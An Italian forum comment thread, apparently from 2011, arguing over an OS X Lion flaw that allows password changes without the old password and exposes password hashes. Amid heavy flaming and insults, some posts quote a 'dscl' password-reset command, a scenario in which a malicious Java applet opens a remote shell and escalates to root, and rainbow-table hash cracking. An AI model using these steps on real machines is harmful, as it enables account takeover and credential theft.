          EPIC FAIL.Hai fatto 3 passi:1) hai cercato di dimostrare che il problema non esiste... ed hai fallito2) Hai cercato di far vedere che su windows c'è la stessa cosa... ed hai fallito3) hai cercato di idmostrare che windows è peggio... ed hai fallito4) ed ora cerchi di svicolare (come sempre) su argomenti fuori da ogni contesto, rispondendo e mostrando link quando ti fa comodo, per screditare chi ti ha fatto fare la solita figura del nullasapiente.Sei piccolo.
          • eleirbag scrive:
            Re: Problema inesistente
            Se sia piccolo o GRANDE non lo so.So di sicuro che sta facendo del male all'utenzaMAC dando disinformazione su come l'attacco possaessere "portato" e sminuendone la sua gravità.Non capisco dove sia il problema.Si ammette il BUG, come ha già fatto Apple, e sitrova la soluzione, che arriverà a breve ne sonosicuro, e magari si corre ai ripari, per chi lovuole fare, usando soluzioni, tipo quella che hosegnalato io, di cambio dei permessi dei fileincriminati.Anche gli ingegneri Apple sono esseri umani e cometutti possono sbagliare, non capisco il problema ?Nessuno pretende che Apple faccia disegnare il suoSoftware dagli Elfi nel bosco di Fangor o forgiareil suo Hardware dai nani nelle viscere di Moira.Insomma ma usare un poco di raziocinio no eh ?
          • hermanhesse scrive:
            Re: Problema inesistente
            - Scritto da: eleirbag
            Se sia piccolo o GRANDE non lo so.
            So di sicuro che sta facendo del male all'utenza
            MAC dando disinformazione su come l'attacco possa
            essere "portato" e sminuendone la sua gravità.Questo è quello che mi fa incavolare!!!!Che grazie a postatori seriali come lui si crei disinformazione!

            Non capisco dove sia il problema.
            Si ammette il BUG, come ha già fatto Apple, e si
            trova la soluzione, che arriverà a breve ne sono
            sicuro, e magari si corre ai ripari, per chi lo
            vuole fare, usando soluzioni, tipo quella che ho
            segnalato io, di cambio dei permessi dei file
            incriminati.Esatto! Che poi la soluzione è semplice (qualcuno l'ha postata, mi sembra, ma basta andare su http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.html ed è tutto spiegato)Perchè le persone devono restare per forza nell'ignoranza?

            Anche gli ingegneri Apple sono esseri umani e come
            tutti possono sbagliare, non capisco il problema ?
            Nessuno pretende che Apple faccia disegnare il suo
            Software dagli Elfi nel bosco di Fangor o forgiare
            il suo Hardware dai nani nelle viscere di Moira.
            Insomma ma usare un poco di raziocinio no eh ?Sante parole. Basterebbe stare con i piedi per terra e avere più riguardo nel dare dell'idiota o del cantinaro a chi non usa OSX (cosa che invece è automatica) per migliorare nettamente la situazione.
          • eleirbag scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse

            Esatto! Che poi la soluzione è semplice (qualcuno
            l'ha postata, mi sembra, ma basta andare su
            http://www.defenceindepth.net/2011/09/cracking-os-Si esatto, l'avevo postata anche io in un'altro post.Ce ne sarebbero anche altre, ma non sono più efficaci.

            Perchè le persone devono restare per forza
            nell'ignoranza?Perchè è più comodo, si fa molta meno fatica,e ti permette di mettere facilmente al rogogli oppositori o comunque chi non la pensa allostesso modo.Il Fascismo è sempre dietro l'angolo del ns. animo.Lo capirono per prime le prime tribù degli uominiSapiens, e tale comportamento si protrae ancora algiorno d'oggi, purtroppo! :-(
            Sante parole. Basterebbe stare con i piedi per
            terra e avere più riguardo nel dare dell'idiota o
            del cantinaro a chi non usa OSX (cosa che invece
            è automatica) per migliorare nettamente la
            situazione.Con la verità raramente si risplende, ma con il Mito quasi sempre."Il grande nemico della verità molto spesso non è la menzogna: deliberata, creata ad arte e disonesta; quanto il mito: persistente, persuasivo ed irrealistico."John Fitzgerald Kennedy
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: eleirbag
            Il Fascismo è sempre dietro l'angolo del ns.
            animo.
            le prime tribù degli uomini
            Sapiens,
            Con la verità raramente si risplende, ma con il
            Mito quasi
            sempre.
            Il grande nemico della verità molto spesso non è
            la menzogna: deliberata, creata ad arte e
            disonesta; quanto il mito: persistente,
            persuasivo ed
            irrealistico.
            "
            John Fitzgerald KennedyCon i piedi per terra, eh? (rotfl)(rotfl)(rotfl)
          • eleirbag scrive:
            Re: Problema inesistente
            Mamma mia quanto sei prevenuto, fazioso, e cieco!Ma quale trauma hai mai patito per esser diventatocosì ? Ti è caduto un Apple II in testa da piccoloe ti è rimasta la mela marchiata sul cranio ?Sei stato rapito dagli "uomini in nero della Apple"e vivi la Sindrome di Stoccolma per i tuoi rapitori ?Non riesci nemmeno ad ammettere quello che è unproblema e se lo ammetti, mai direttamente però, losminuisci e deridi chi ti fa notare questo.E te lo fa notare in modo educato e propositivo.Sei un male per la Apple e non un bene, come tu pensidi essere. Mi consola sol il fatto che Tu sei un "Caso"e non la media degli utenti MAC.-----------------------------------------------------------Modificato dall' autore il 21 settembre 2011 12.55-----------------------------------------------------------
          • krane scrive:
            Re: Problema inesistente
            - Scritto da: eleirbag
            Mamma mia quanto sei prevenuto, fazioso, e ceco!
            Ma quale trauma hai mai patito per esser diventato
            così ? Ti è caduto un Apple II in testa da piccolo
            e ti è rimasta la mela marchiata sul cranio ?
            Sei stato rapito dagli "uomini in nero della
            Apple" e vivi la Sindrome di Stoccolma per i
            tuoi rapitori ?
            Non riesci nemmeno ad ammettere quello che è un
            problema e se lo ammetti, mai direttamente però,
            lo sminuisci e deridi chi ti fa notare questo.non e' un problema, e' una featùr, parola di ruppolo :D
            E te lo fa notare in modo educato e propositivo.
            Sei un male per la Apple e non un bene, come tu
            pensi
            di essere. Mi consola sol il fatto che Tu sei un
            "Caso"
            e non la media degli utenti MAC.
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: eleirbag
            Mamma mia quanto sei prevenuto, fazioso, e cieco!
            Ma quale trauma hai mai patito per esser diventato
            così ? Ti è caduto un Apple II in testa da piccolo
            e ti è rimasta la mela marchiata sul cranio ?
            Sei stato rapito dagli "uomini in nero della
            Apple"
            e vivi la Sindrome di Stoccolma per i tuoi
            rapitoriSempre coi piedi per terra, eh?Ma non vedi che ti rendi ridicolo?
          • Tuo padre scrive:
            Re: Problema inesistente
            Ma tu da dove arrivi? Ma non ti hanno ancora bannato?
          • gnammolo scrive:
            Re: Problema inesistente
            ruppolo è un bot
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: gnammolo
            ruppolo è un botBot a me???!Se ti prendo...
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: Tuo padre
            Ma tu da dove arrivi?Senti chi parla...
            Ma non ti hanno ancora
            bannato?A quanto pare no.
          • hermanhesse scrive:
            Re: Problema inesistente
            Cioè in pratica... chiunque passa di qui ti prende per il *ulo e tu ti senti fiero e gli rispondi anche (ROTFL)...
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Cioè in pratica... chiunque passa di qui ti
            prende per il *ulo e tu ti senti fiero e gli
            rispondi anche
            (ROTFL)...Veramente sono io che li piglio per il XXXX.
          • hermanhesse scrive:
            Re: Problema inesistente
            Non sembra proprio a nessuno (salvo te) !
          • hermanhesse scrive:
            Re: Problema inesistente
            Qui di ridicolo ci sei solo tu. (ROTFL)
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Qui di ridicolo ci sei solo tu. (ROTFL)Ah certo, l'ha detto l'oracolo.
          • hermanhesse scrive:
            Re: Problema inesistente
            No, l'ha detto il 100% (escluso te) di quelli che hanno postato oggi qui sopra.
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            No, l'ha detto il 100% (escluso te) di quelli che
            hanno postato oggi qui
            sopra.Eh, com'è che si dice, la mamma degli XXXXXXXXX è sempre incinta.-----------------------------------------------------------Modificato dall' autore il 21 settembre 2011 15.52-----------------------------------------------------------
          • hermanhesse scrive:
            Re: Problema inesistente
            In svizzera quando sei nato tu usavano atrazina a gogo, vero?
          • eleirbag scrive:
            Re: Problema inesistente
            Guarda quello che ho scritto è per Tanti ma non per Tutti.Dunque non ti preoccupare non è colpa tua se ti sembraridicolo.Comunque, ricordati, meglio ridicolo, per chi non capisceo non vuol capire, che Ottuso come lo sei Tu.
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: eleirbag
            Guarda quello che ho scritto è per Tanti ma non
            per
            Tutti.
            Dunque non ti preoccupare non è colpa tua se ti
            sembra
            ridicolo.

            Comunque, ricordati, meglio ridicolo, per chi
            non
            capisce
            o non vuol capire, che Ottuso come lo sei Tu.L'uso che fai delle maiuscole è una licenza poetica?
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Sante parole. Basterebbe stare con i piedi per
            terraAppunto! Inizia tu.
          • hermanhesse scrive:
            Re: Problema inesistente
            Poveretto.
          • hermanhesse scrive:
            Re: Problema inesistente
            Senti Ruppolo, hai rotto il XXXXX con la tua ignoranza abissale.Solo gli idioti non cambiano idea...
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Senti Ruppolo, hai rotto il XXXXX con la tua
            ignoranza
            abissale.
            Solo gli idioti non cambiano idea...A corto di argomenti, eh?
          • hermanhesse scrive:
            Re: Problema inesistente
            No, ho le OO che strusciano per terra a forza di spiegarti le cose.A proposito, ti mando la fattura per la lezione.Paga mi raccomando.
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            No, ho le OO che strusciano per terra a forza di
            spiegarti le
            cose.

            A proposito, ti mando la fattura per la lezione.
            Paga mi raccomando.Fattura? Tu? Ma sei uno <s
            schiavo </s
            dipendente...
          • hermanhesse scrive:
            Re: Problema inesistente
            io sono uno schiavo con una p.iva .E senza usare la p.iva mi pagano. Mi pagano poi di nuovo on la p.iva.
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: eleirbag
            Se sia piccolo o GRANDE non lo so.
            So di sicuro che sta facendo del male all'utenza
            MAC dando disinformazione su come l'attacco possa
            essere "portato" e sminuendone la sua gravità.Infatti non è assolutamente grave, come non lo sono le altre falle di sicurezza.Vedi, se dimentico di chiudere le porte dell'automobile nel garage di casa non è grave, se invece lo faccio quando la macchina è parcheggiata al grill dell'autostrada è molto grave.
            Non capisco dove sia il problema.Allora siamo in due.
            Si ammette il BUG, come ha già fatto Apple, e si
            trova la soluzione, che arriverà a breve ne sono
            sicuro, e magari si corre ai ripari, per chi lo
            vuole fare, usando soluzioni, tipo quella che ho
            segnalato io, di cambio dei permessi dei file
            incriminati.Io non farà proprio nulla, il rischio non vale la pena di spendere nemmeno un minuto di tempo.
            Anche gli ingegneri Apple sono esseri umani e come
            tutti possono sbagliare, non capisco il problema ?
            Nessuno pretende che Apple faccia disegnare il suo
            Software dagli Elfi nel bosco di Fangor o forgiare
            il suo Hardware dai nani nelle viscere di Moira.
            Insomma ma usare un poco di raziocinio no eh ?Infatti, usare il raziocinio, cosa che qui non si sta facendo. Qui si preferisce gridare "al lupo".
          • hermanhesse scrive:
            Re: Problema inesistente
            Tu non hai capito niente.Niente. Di tutto il problema tu non hai capito nulla, ma non è importante capire: l'importante è insabbiare.Peccato che nessuno ti creda.
          • froyone scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            Tu non hai capito niente.
            Niente. Di tutto il problema tu non hai capito
            nulla, ma non è importante capire: l'importante è
            insabbiare.

            Peccato che nessuno ti creda.Ma scusa, se si e' incaponito cosi' a difendere l'indifendibile, scrivendo centinaia di post dove in ognuno si sXXXXXXX piu' dell'altro, non credi che invece abbia capito tutto?Come giustifichi altrimenti questo grosso sforzo che sta facendo per insabbiare, nascondere e disinformare?Secondo me si e' reso conto benissimo, altrimenti avrebbe ignorato. Sta semplicemente facendo il suo lavoro di consulente apple.
          • Funz scrive:
            Re: Problema inesistente
            - Scritto da: froyone
            Ma scusa, se si e' incaponito cosi' a difendere
            l'indifendibile, scrivendo centinaia di post dove
            in ognuno si sXXXXXXX piu' dell'altro, non credi
            che invece abbia capito
            tutto?

            Come giustifichi altrimenti questo grosso sforzo
            che sta facendo per insabbiare, nascondere e
            disinformare?

            Secondo me si e' reso conto benissimo, altrimenti
            avrebbe ignorato.

            Sta semplicemente facendo il suo lavoro di
            consulente
            apple.Me lo sono chiesto più di una volta, cosa lo spinga a continuare nonostante i continui e totali spu**anamenti, e la figura del fanatico irragionevole che fa. Le uniche spiegazioni sono: il denaro e la malattia mentale...
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse
            - Scritto da: ruppolo

            - Scritto da: hermanhesse


            Ma tu... tu sei completamente fuori!
            (ROTFL)



            Preso in castagna, eh?

            ma no, lo sapevamo già che eri fuori.





            Cioè hai aspettato un + per farmi
            vedere
            che


            cresce?


            (ROTFL)



            E tu cosa volevi farmi vedere?

            Che Apple sale e scende come tutti i titoli e che
            esistono titoli meno gonfiati che salgono
            proporzionalmente di
            più?Oppure che il titolo era sceso perché Steve Jobs non era più CEO di Apple?La notizia era proprio quella: "Apple, Steve Jobs non è più CEO".La trollata ti è andata male @^





            Ragazzi, ricovero coatto...



            EPIC FAIL.

            Hai fatto 3 passi:

            1) hai cercato di dimostrare che il problema non
            esiste... ed hai
            fallitoIo cercato di dimostrare? No no, io ho detto che il problema è INESISTENTE.
            2) Hai cercato di far vedere che su windows c'è
            la stessa cosa... ed hai
            fallitoDov'è che ho fallito?
            3) hai cercato di idmostrare che windows è
            peggio... ed hai
            fallitoWindows È peggio, lo dicono gli utenti:http://www.theacsi.org/index.php?option=com_content&view=article&id=210:acsi-scores-september&catid=14&Itemid=265
            4) ed ora cerchi di svicolare (come sempre) su
            argomenti fuori da ogni contesto, rispondendo e
            mostrando link quando ti fa comodo, per
            screditare chi ti ha fatto fare la solita figura
            del
            nullasapiente.Screditarti è un piacere.
            Sei piccolo.Ma tosto!
          • hermanhesse scrive:
            Re: Problema inesistente
            - Scritto da: ruppolo
            - Scritto da: hermanhesse

            - Scritto da: ruppolo


            - Scritto da: hermanhesse



            Ma tu... tu sei completamente
            fuori!

            (ROTFL)





            Preso in castagna, eh?



            ma no, lo sapevamo già che eri fuori.








            Cioè hai aspettato un + per farmi

            vedere

            che



            cresce?



            (ROTFL)





            E tu cosa volevi farmi vedere?



            Che Apple sale e scende come tutti i titoli
            e
            che

            esistono titoli meno gonfiati che salgono

            proporzionalmente di

            più?

            Oppure che il titolo era sceso perché Steve Jobs
            non era più CEO di
            Apple?
            La notizia era proprio quella: "Apple, Steve Jobs
            non è più
            CEO".
            La trollata ti è andata male @^Veramente dovresti vedere il post sopra, il tuo, con la tua statistica, per capire cosa centrava il mio di post.Altro fail, che giornataccia eh Ruppolo?









            Ragazzi, ricovero coatto...





            EPIC FAIL.



            Hai fatto 3 passi:



            1) hai cercato di dimostrare che il problema
            non

            esiste... ed hai

            fallito

            Io cercato di dimostrare? No no, io ho detto che
            il problema è
            INESISTENTE.Allora vai su:http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.htmle scrivilo. Sentiamo cosa ti dicono.


            2) Hai cercato di far vedere che su windows
            c'è

            la stessa cosa... ed hai

            fallito

            Dov'è che ho fallito?Dov'è che c'è scritto? Postami un link, prego!


            3) hai cercato di idmostrare che windows è

            peggio... ed hai

            fallito

            Windows È peggio, lo dicono gli utenti:
            http://www.theacsi.org/index.php?option=com_contenE tutti quelli che si lamentano di OSX e soprattutto di Lion? Basta cercare su internet.Ri-FAIL!


            4) ed ora cerchi di svicolare (come sempre)
            su

            argomenti fuori da ogni contesto,
            rispondendo
            e

            mostrando link quando ti fa comodo, per

            screditare chi ti ha fatto fare la solita
            figura

            del

            nullasapiente.

            Screditarti è un piacere.Peccato che tu non ci riesca mai.


            Sei piccolo.
            Ma tosto!No, ignorante. Come gli abitanti delle valli più imboscate delle nostre Alpi 50 anni fa. Ma all'epoca non c'era internet.
          • ruppolo scrive:
            Re: Problema inesistente
            - Scritto da: hermanhesse Veramente dovresti vedere il post sopra, il tuo,
            con la tua statistica, per capire cosa centrava
            il mio di
            post.
            Altro fail, che giornataccia eh Ruppolo?Giornata splendida, ti ho appena fatto fare la figura del XXXXX.
            Allora vai su:

            http://www.defenceindepth.net/2011/09/cracking-os-

            e scrivilo. Sentiamo cosa ti dicono.Lo hanno scritto già in molti.




            2) Hai cercato di far vedere che su
            windows

            c'è


            la stessa cosa... ed hai


            fallito



            Dov'è che ho fallito?

            Dov'è che c'è scritto? Postami un link, prego!Leggi i commenti sulla stessa pagina che hai linkato.
            E tutti quelli che si lamentano di OSX e
            soprattutto di Lion?Sono una minoranza, che conta appunto come una minoranza.
            Basta cercare su internet.
            Ri-FAIL!FAIL tu, ti ho appena dimostrato che i problemi con Windows sono di quasi 2 ordini di grandezza superiori. Tra l'altro usando lo stesso metodo da troll che hai usato tu.
            Peccato che tu non ci riesca mai.Appena riuscito. Volevi dimostrare che il titolo Apple sarebbe precipitato dopo le dimissioni di Jobs, e invece è salito. Tiè!
            No, ignorante. Come gli abitanti delle valli più
            imboscate delle nostre Alpi 50 anni fa. Ma
            all'epoca non c'era
            internet.Anche ora, basta non accendere il computer.
          • gnammolo scrive:
            Re: Problema inesistente
            no ruppolo la figura del XXXXX è una tua esclusiva, credimi, da quando dovella è sparito ci solo tu imperatore del water otturato
          • hermanhesse scrive:
            Re: Problema inesistente
            - Scritto da: ruppolo
            - Scritto da: hermanhesse
            Veramente dovresti vedere il post sopra, il tuo,

            con la tua statistica, per capire cosa
            centrava

            il mio di

            post.

            Altro fail, che giornataccia eh Ruppolo?

            Giornata splendida, ti ho appena fatto fare la
            figura del
            XXXXX.A me e a tutti gli altri sembra il contrario.


            Allora vai su:




            http://www.defenceindepth.net/2011/09/cracking-os-



            e scrivilo. Sentiamo cosa ti dicono.

            Lo hanno scritto già in molti.Peccato che scrivono:dscl localhost -passwd /Search/testuserAnche a te non dice niente la cosa eh? Sai perchè? Perchè NON SAI USARE Osx.








            2) Hai cercato di far vedere che su

            windows


            c'è



            la stessa cosa... ed hai



            fallito





            Dov'è che ho fallito?



            Dov'è che c'è scritto? Postami un link,
            prego!

            Leggi i commenti sulla stessa pagina che hai
            linkato.Non mi servono dei post, mi serve un articolo su un sito dove dice che questa falla di OSX è uguale a quella di $sistemaMicro$oft.


            E tutti quelli che si lamentano di OSX e

            soprattutto di Lion?

            Sono una minoranza, che conta appunto come una
            minoranza.OSX è una minoranza già di suo, o forse non te ne rendi conto?


            Basta cercare su internet.

            Ri-FAIL!

            FAIL tu, ti ho appena dimostrato che i problemi
            con Windows sono di quasi 2 ordini di grandezza
            superiori. peccato che il numero degli utenti è di 10 ordini superiori (ROTFL)!
            Tra l'altro usando lo stesso metodo da
            troll che hai usato
            tu.il metodo da troll lo uso contro i poveri troll ignoranti come te.


            Peccato che tu non ci riesca mai.

            Appena riuscito. Volevi dimostrare che il titolo
            Apple sarebbe precipitato dopo le dimissioni di
            Jobs, e invece è salito.
            Tiè!io invece volevo dimostrare come le statistiche siano una fesseria. Vedi il tuo post precedente.tu sei stato così povero e meschino da :1) capire il contrario in malafede2) attendere il minimo rialzo del titolo per cercare di fare una figurona.Ed invece ci hai rimediato una figura di palta. Come al solito.


            No, ignorante. Come gli abitanti delle valli
            più

            imboscate delle nostre Alpi 50 anni fa. Ma

            all'epoca non c'era

            internet.

            Anche ora, basta non accendere il computer.ne sanno comunque di informatica più di te.
  • hermanhesse scrive:
    Da notare
    Notate che gli UNICI fanboy che continuano a minimizzare il problema sono Ruppolo e TheOriginalFanboy... cioè, avere del tempo da perdere e fare una applet apposita (magari ce ne sono già di preconfezionate che fanno shell) e mettergli un link in risposta a qualche loro flame sarebbe magari di aiuto a convincerli che il sistema sicuro non esiste?
    • ruppolo scrive:
      Re: Da notare
      - Scritto da: hermanhesse
      Notate che gli UNICI fanboy che continuano a
      minimizzare il problema sono Ruppolo e
      TheOriginalFanboy...

      cioè, avere del tempo da perdere e fare una
      applet apposita (magari ce ne sono già di
      preconfezionate che fanno shell) e mettergli un
      link in risposta a qualche loro flame sarebbe
      magari di aiuto a convincerli che il sistema
      sicuro non
      esiste?Anche la porta sicura non esiste, quindi perché ostinarsi con le chiavi? Perché installare porte blindate?La misura, questa sconosciuta...
    • TheOriginalFanboy scrive:
      Re: Da notare
      - Scritto da: hermanhesse
      Notate che gli UNICI fanboy che continuano a
      minimizzare il problema sono Ruppolo e
      TheOriginalFanboy...

      cioè, avere del tempo da perdere e fare una
      applet apposita (magari ce ne sono già di
      preconfezionate che fanno shell) e mettergli un
      link in risposta a qualche loro flame sarebbe
      magari di aiuto a convincerli che il sistema
      sicuro non
      esiste?grazie, mi hai citato, allora qualcosa conto. sono importante per teahahahahahora, con calma, dimmi se mai ho detto che osx è sicuro, hai tempo 100 anni per tornare indietro nei miei post...tira tu le somme, mai detto. anzi, ho proprio scritto che questa cosa è una cacata pazzesca.intanto giro sui pc dei miei amici con win 7 e xp a cambiarele pass senza bisogno di essere admin oppure si è admin per default.. grasse risate
  • sgabe scrive:
    Re: Uno
    .....quello non è lavorare? Cosa sarebbe per te lavorare in un ufficio, fotoscioppe........ quelli vedi li manderei a zappare....
    • ruppolo scrive:
      Re: Uno
      - Scritto da: sgabe
      .....quello non è lavorare? Cosa sarebbe per te
      lavorare in un ufficio, fotoscioppe........
      quelli vedi li manderei a
      zappare....Anche impaginare è lavorare.
    • il solito bene informato scrive:
      Re: Uno
      - Scritto da: sgabe
      .....quello non è lavorare? Cosa sarebbe per te
      lavorare in un ufficio, fotoscioppe........
      quelli vedi li manderei a
      zappare....secondo la tua logica il fatto di sedersi davanti ad un computer non sarebbe <i
      lavorare </i
      se un giorno dovessi diventare freelance spero di non avere clienti come te.
      • sgabe scrive:
        Re: Uno
        - Scritto da: il solito bene informato
        - Scritto da: sgabe

        .....quello non è lavorare? Cosa sarebbe per
        te

        lavorare in un ufficio, fotoscioppe........

        quelli vedi li manderei a

        zappare....

        secondo la tua logica il fatto di sedersi davanti
        ad un computer non sarebbe <i
        lavorare
        </i
        Io credo seriemente che dietro ad immagine si sperperanno soldi e non è lavorare. Davanti ad un computer ci stanno anche i contabili e quello è lavorare.


        se un giorno dovessi diventare freelance spero di
        non avere clienti come
        te.non ti preoccupare...
  • daniele_dll scrive:
    shadow accessibile a tutti...
    Ma vi rendete realmente conto di cosa significa?Significa che basta una rainbow table è 2 minuti per avere la password originale presente sul sistema -.-'Potete anche mettere la password più lunga e complessa del mondo, disabilitare tutti gli autologin che volete, ma se si arriva a prendere lo shadow file basteranno sempre e comunque 2 minuti.Il problema reale non è che si può cambiare la password all'utente con un comando da console, ma che da remoto, basta una paginetta web vulnerabile (per chi ci fa hosting) o una condivisione fatta "momo" e si può copiare il file con le hash delle password e fare na strage!PS: no, non mi dite che c'è lo stesso problema con windows perché benché sia affetto da notevoli problemi di sicurezza, ed è innegabile, almeno non è possibile accedere agli hash delle password senza essere utente amministratore (quindi non basta una pagina web fatta male o il disco c condiviso)
    • vintage scrive:
      Re: shadow accessibile a tutti...
      - Scritto da: daniele_dll
      Ma vi rendete realmente conto di cosa significa?

      Significa che basta una rainbow table è 2 minuti
      per avere la password originale presente sul
      sistema
      -.-'

      Potete anche mettere la password più lunga e
      complessa del mondo, disabilitare tutti gli
      autologin che volete, ma se si arriva a prendere
      lo shadow file basteranno sempre e comunque 2
      minuti.

      Il problema reale non è che si può cambiare la
      password all'utente con un comando da console, ma
      che da remoto, basta una paginetta web
      vulnerabile (per chi ci fa hosting) o una
      condivisione fatta "momo" e si può copiare il
      file con le hash delle password e fare na
      strage!

      PS: no, non mi dite che c'è lo stesso problema
      con windows perché benché sia affetto da notevoli
      problemi di sicurezza, ed è innegabile, almeno
      non è possibile accedere agli hash delle password
      senza essere utente amministratore (quindi non
      basta una pagina web fatta male o il disco c
      condiviso)Tanto valeva mettere le pwd in /etc/passwdmetodo utilizzato prima dell' invenzione dello shadow
      • hermanhesse scrive:
        Re: shadow accessibile a tutti...
        In effetti la cosa stupefacente è che con questi permessi lo shadow non serve ad un tubo!!!!!!!!!! (ROTFL)
  • Alex99 scrive:
    Mah..
    "Per cambiare la password dell'utente corrente"... voglio dire: per cambiare la password all'utente corrente.. DEVI ESSERE l'utente corrente!Quindi il problema è che ogni utente può cambiare la sua password? :-DPer la shadow pubblica: se fosse un server capirei il problemaComunque TUTTI i sistemi sono a craccabili quando è possibile metterci le mani sopra.In fondo basta entrare con un live cd.. oppure scollegare un attimo l'hd
  • hermanhesse scrive:
    È un po' che si sapeva...
    Maruccia, questa volta arriviamo in ritardo eh ?;)Ad ogni modo la situazione di Skype mi sembra più preoccupante...
  • TheOriginalFanboy scrive:
    quindi per cambiare una password
    bisogna lasciare un mac incustodito con lion aperto e l'utente loggato, avere la sfiga che passi megaprogrammatorenerd che faccia partire uno script che ti cambi la password.b'è sempre meglio del cd autoavviante che cancella la pass di windows.. no?ridiamo sempre delle sofrtune altrui ma poi...winari winari.. quando impararere..COMUNQUE in efetti non chiedere l'attuale password per cambiarla è una cacata pazzesca. giù a cupertino interverranno di sicuro.-----------------------------------------------------------Modificato dall' autore il 21 settembre 2011 08.55-----------------------------------------------------------
    • valerivs scrive:
      Re: quindi per cambiare una password
      vero.un grave errore e lo dico da apple fan.spero che rimedino asap-----------------------------------------------------------Modificato dall' autore il 21 settembre 2011 09.14-----------------------------------------------------------
    • eleirbag scrive:
      Re: quindi per cambiare una password
      Non non è così o non solo almeno.Si può farlo anche da remoto e pure da unasessione in Internet con un qualsiasi Browservisitando una pagina fatta ad hoc, anche daloggandosi come user.Non bisogna mai sottovalutare troppo i problemi.Speriamo rilascino la patch quanto prima.
    • panda rossa scrive:
      Re: quindi per cambiare una password
      - Scritto da: TheOriginalFanboy
      bisogna lasciare un mac incustodito con lion
      aperto e l'utente loggato, avere la sfiga che
      passi megaprogrammatorenerd che faccia partire
      uno script che ti cambi la
      password.Il macaco lascia SEMPRE il mac incustodito, perche' in questo modo ha maggior visibilita'.E in quanto al megaprogramamtorenerd, qualunque ragazzino dotato di lettore mp3 in grado di metterci autonomamente gli mp3 dentro, e' capace di lanciare quello script.
      • bertuccia scrive:
        Re: quindi per cambiare una password
        - Scritto da: panda rossa

        Il macaco lascia SEMPRE il mac incustodito,
        perche'tanto c'è il motion sensor che fa da guardiahttp://www.mactricksandtips.com/2008/07/having-fun-with-a-macs-motion-sensor.html
        • hermanhesse scrive:
          Re: quindi per cambiare una password
          Il problema è che la cosa si può fare ad esempio tramite una applet.
          • bertuccia scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse

            Il problema è che la cosa si può fare ad esempio
            tramite una applet.ma infatti il problema c'è, sarebbe stupido negarlo.si sottolinea che in molti casi c'è a monte un problema molto più grave, cioè l'utente che la password proprio non la vuole (login automatico).per chi invece si pone la questione sicurezza, forse questa falla è più difficile da sfruttarequali sono le condizioni in cui deve trovarsi la macchina perchè la falla possa essere sfruttata da remoto o tramite applet?ho visto il tuo articolo ma non ho voglia di leggerlo :D se già le sai, se no me lo vado a leggere
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            A <b
            user with administrative rights </b
            is browsing the internet with Safari. The user happens to browse to a website hosting a <b
            malicious Java Applet </b
            . Unbeknownst to the user, they allow the innocent looking Java Applet to run. The Applet will proceed to make a connection back to the attacker, providing the attacker with full shell access. Whilst the attacker has access to the system, they are provided only with limited user privileges (they still do not have root access). This would limit what an attacker could accomplish. However, with the vulnerabilities described above the attacker now has an advantage: they can change the password of the current user. Now remember, the current user is an administrator. So now all the attacker has to do is sudo s to become root. <b
            If lets say the victim did not have administrative rights, the attacker still has the ability to extract user hashes from the system and attempt to crack them. </b
            In grassetto i requisiti...Qui la fa lunga pensando ad una applet che instaura una comunicazione con l'attaccante, ma basterebbe automatizzare la cosa nella applet.Cosa più grave a mio parere: anche se l'utente NON fosse amministrativo, esiste la possibilità di scaricare gli hashes delle utenze e craccarseli con comodo.
    • hermanhesse scrive:
      Re: quindi per cambiare una password
      Quale parte di "può accadere anche da internet" non ti è chiara?Certo che non sei 0, ma -1!!!!Prego, leggi:http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.html
    • gnammolo scrive:
      Re: quindi per cambiare una password

      b'è sempre meglio del cd autoavviante che
      cancella la pass di windows..
      no?a dire il vero per cancellare una password si fa così anche su mac, basta un dvd con il system in uso
      • gnammolo scrive:
        Re: quindi per cambiare una password
        a si perché poi non mi credete: http://aranzulla.tecnologia.virgilio.it/eliminare-la-password-di-acXXXXX-mac-752.htmlAi winari e linari lascio le grassissime risate su quanto poco basti per violare un mac.Ho sempre più la sensazione che se windows è il paradiso dei virus, mac os x lo sia per gli hackers
        • hermanhesse scrive:
          Re: quindi per cambiare una password
          Non bestemmiare... se quello è fare hacking... (ROTFL)
        • ruppolo scrive:
          Re: quindi per cambiare una password
          - Scritto da: gnammolo
          a si perché poi non mi credete:
          http://aranzulla.tecnologia.virgilio.it/eliminare-

          Ai winari e linari lascio le grassissime risate
          su quanto poco basti per violare un
          mac.

          Ho sempre più la sensazione che se windows è il
          paradiso dei virus, mac os x lo sia per gli
          hackersCon la differenza che l'hacker deve entrare fisicamente a casa tua.
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            A dimostrazione che non hai ancora capito un ra@@o: quale parte di "si può fare da una pagina web" non ti è chiara????
          • panda rossa scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            A dimostrazione che non hai ancora capito un
            ra@@o: quale parte di "si può fare da una pagina
            web" non ti è
            chiara????E come la fai la pagina web se l'hacker non entra in casa tua?
          • hermanhesse scrive:
            Re: quindi per cambiare una password
            Panda... questa non l'ho capita... sicuro di stare bene?
          • panda rossa scrive:
            Re: quindi per cambiare una password
            - Scritto da: hermanhesse
            Panda... questa non l'ho capita... sicuro di
            stare
            bene?Ruppolo dice che l'hacker non entra mica in casa tua, quindi la tua pagina web a che serve?Il macaco usa solo le app, mica gironzola sul web.Al massimo va su macity.Quindi e' assolutamente necessario che l'hacker ti entri in casa, metta le mani sul tuo mac, e acceda a quella pagina web.
          • valerivs scrive:
